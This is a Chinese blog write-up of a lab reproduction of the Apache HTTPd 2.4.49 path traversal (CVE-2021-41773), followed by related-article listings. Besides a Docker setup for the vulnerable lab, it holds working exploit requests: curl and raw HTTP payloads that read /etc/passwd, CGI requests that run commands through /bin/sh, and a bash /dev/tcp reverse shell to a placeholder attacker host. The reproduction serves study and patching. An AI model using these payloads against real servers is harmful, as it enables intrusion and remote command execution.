【漏洞复现】Apahce HTTPd 2.4.49(CVE-2021-41773)路径穿越漏洞

已于 2024-05-09 20:56:25 修改
阅读量773 收藏 3
点赞数 5
分类专栏: WEB安全 服务器 文章标签: 服务器 网络安全 web安全 apache
于 2024-05-09 20:51:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75762088/article/details/138624852
版权

简介: Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。

漏洞描述 

在对 Apache HTTP Server 2.4.49 中的路径规范化所做的更改中发现一个缺陷。穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>,攻击者可能使用路径遍历攻击将 URL 映射到类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“require all denied”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程执行代码。此问题仅影响 Apache 2.4.49,而不影响早期版本。

CVE Record | CVEicon-default.png?t=N7T8https://www.cve.org/CVERecord?id=CVE-2021-41773

指纹:app:“apache web server 2.4.49 2.4.50”

影响版本

Apache HTTP Server 2.4.49

漏洞复现

靶场准备

docker环境搭建:

mkdir Dockerfile //在空目录里面创建Dockerfile目录
cd Dockerfile //进入Dockerfile目录
vi Dockerfile //创建文件Dockerfil并编写

编辑DockerFile文件内容:

FROM httpd:2.4.49

RUN set -ex \
    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf \
    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf \
    && cat /usr/local/apache2/conf/httpd.conf \
        | tr '\n' '\r' \
        | perl -pe 's|<Directory />.*?</Directory>|<Directory />\n    AllowOverride none\n    Require all granted\n</Directory>|isg' \
        | tr '\r' '\n' \
        | tee /tmp/httpd.conf \
    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

执行构建操作: 

docker build -t  httpd:2.4.49rce .

运行docker:

docker run -d -p 85:80 httpd:2.4.49rce

浏览器访问85端口,出现“It works!”说明部署成功:

poc

目录遍历POC:

curl -v --path-as-is http://XXXXX:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

 或者

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

exp 

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: xx.xx.xx.xx:xx
Content-Type: text/plain
Content-Length: 8

echo; id

 curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "xx.xx.xx.xx:xx/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"

 反弹shell:

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 123.58.224.8:63275
Content-Type: text/plain
Content-Length: 50

echo; bash -c '0<&168-;exec 168<>/dev/tcp/xx.xx.xx.xx/xx;bash <&168 >&168 2>&168'

漏洞修复 

升级Apache HTTP Server到最新版本

Apache HTTP Server 2.4.49 路径穿越漏洞CVE-2021-41773
weixin_47311099的博客
12-07 2123
Apache HTTP Server 2.4.49 路径穿越漏洞复现CVE-2021-41773Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: 版本等于2.4.49 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的) 攻击者利用这个漏洞,可以
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
weixin_42786460的博客
09-25 1177
Apache HTTP Server 2.4.49 路径穿越漏洞 (CVE-2021-41773)
Apache 漏洞复现(vulhub)
最新发布
huangdingyu6的博客
03-12 963
在有多个后缀的情况下,只要一个文件含有后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。要匹配 $ 字符本身,请使用 $。从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 4052
一、漏洞描述 Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
Apache 2.4.49 路径穿越漏洞复现 ( CVE-2021-41773 )
qq_45396375的博客
01-04 760
Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行。
linux源码编译安装apache( httpd-2.4.53)处理服务器支持 TLS Client-initiated 重协商攻击(CVE-2011-1473)
liaodaoguo的博客
03-30 1924
linux源码编译安装apache 首先我们需要下载相关的依赖包 apr、apr-util、pcre 1.配置依赖环境 (1) 配置apr依赖 解压依赖包: tar -xf apr-1.7.0.tar.gz 进入解压后的目录:cd apr-1.7.0 配置(设置安装在/usr/local/apr)./configure --prefix=./configure --prefix=/usr/local/apr 编译并安装:make && make install (2) 配置apr-util
[中间件漏洞]apache漏洞复现
紫洋的博客
05-25 1450
2.4.0~2.4.29版本中存在 一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器安全策略。Apache默认一个文件可以有多个以点分割的后缀,当最右边的后缀无法识别,则继续向左识别,直到识别到合法后缀才进行解析。最后一个后缀名为.jpg,合法,因为文件名info.php.jpg中包含.php,所以解析为php文件。在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀。先创建文件,文件内容为phpinfo。
如何挖掘Apache2中的CVE-2021-41773漏洞
HBohan的博客
12-06 3359
根据Apache官方发布的安全公告,Apache HTTP Server中存在一个路径穿越漏洞漏洞编号为CVE-2021-41773。A
Apache漏洞—多后缀名解析、目录遍历和(CVE-2017-15715)
今天也要加油鸭
03-25 5936
文章目录一、Apache httpd 多后缀解析漏洞漏洞原理漏洞复现漏洞修复 Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩展,将Perl/Python等解释器编译到服务器中。 一、Apache h...
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3466
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
apache-httpd_2.4.49_path-traversal_CVE-2021-41773
acdcccc的博客
09-07 246
Apache httpd 2.4.49 路径穿越漏洞
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞CVE-2021-41773
weixin_53639243的博客
02-27 448
如果这些目录之外的文件不受通常的默认配置“require all denied”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程执行代码。在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。Apache HTTP 服务器项目旨在为现代操作系统(包括 UNIX 和 Windows)开发和维护开源 HTTP 服务器。发送到重发器,进行改包操作。
Apache HTTP Server 2.4.49 路径穿越,远程命令执行漏洞
cainiao17441898的博客
10-20 1819
文章目录项目场景:问题描述:原因分析:解决方案: 项目场景: Apache HTTP Server 2.4.492.5.0 问题描述: 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 原因分析: 远程命令执行 在httpd.conf的文件中的这俩配置,导致任意请求都能访问根目录,和cgi-bin目录。 CGI是一段程序,它运行在Server上,提供同客户端 Html页面的接口。如果它能目
Apache 2.4.49 路径穿越漏洞复现CVE-2021-41773
qq_51163834的博客
05-31 557
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。启动环境前要先到对应的目录。如本次对CVE-2021-41773漏洞进行复现,先到vulhub/httpd/CVE-2021-41773目录下启动环境。首次尝试要先安装docker、docker-compose、vulhub。Burpsuite中,获取passwd文件内容。反弹shell。Burpsuit下输出当前用户。
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 1133
CVE-2021-41773 漏洞复现
Apache最新版本:Apache 2.4.49
CqcVue的博客
09-24 618
Apache 2.4.49Apache软件的最新版本,它提供了一些新功能和改进,并修复了一些问题。通过按照上述步骤,您可以轻松地安装和配置Apache服务器。使用Apache,您可以搭建高性能、可靠和安全Web服务。您可以从Apache官方网站(http://httpd.apache.org/download.cgi)上下载Apache 2.4.49的源代码包。Apache是一款广泛使用的开源Web服务器软件,由Apache软件基金会开发和维护。请注意,以上提供的步骤是基于源代码安装的方式。
Apache HTTPd 2.4.49 路径穿越漏洞CVE-2021-41773复现
weixin_59086772的博客
12-10 2586
0x00 漏洞概述 2021年10月5日,Apache官方发布了一批漏洞信息,其中Apache HTTP Server路径穿越漏洞CVE-2021-41773。 满足条件: 版本等于2.4.49 穿越的目录允许被访问,比如配置了Require all granted。(默认情况下是不允许的) 0x01环境搭建 使用docker搭建Apache HTTPd 2.4.49版本服务器: Dockerfile FROM vulhub/httpd:2.4.49 LABEL mai
Apache漏洞CVE-2021-41773
qq_68186313的博客
08-07 304
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件 在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)3、在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cg命令。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

中二电工吹短笛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值